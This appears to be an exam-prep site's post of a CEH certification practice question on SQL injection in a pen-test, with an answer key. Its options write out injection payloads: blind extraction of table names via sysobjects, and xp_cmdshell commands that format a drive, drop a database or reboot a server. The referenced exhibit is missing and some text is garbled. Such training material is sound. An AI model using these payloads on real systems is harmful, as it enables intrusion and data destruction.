What is the next step you should do?

Posted by: Pdfprep Category: CEH-001 Tags: , , Post Date: January 31, 2021

Exhibit:

You are conducting pen-test against a company’s website using SQL Injection techniques.

You enter “anuthing or 1=1-“ in the username filed of an authentication form. This is the output returned from the server.

What is the next step you should do?
A . Identify the user context of the web application by running_http://www.example.com/order/include_rsa_asp?pressReleaseID=5 AND USER_NAME() = ‘dbo’
B . Identify the database and table name by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5
AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype=’U’), 1))) > 109
C . Format the C: drive and delete the database by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell ‘format c: /q /yes ‘; drop database myDB; -­
D . Reboot the web server by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell ‘iisreset Creboot’; -­

Answer: A

Author

Leave a Reply

Your email address will not be published.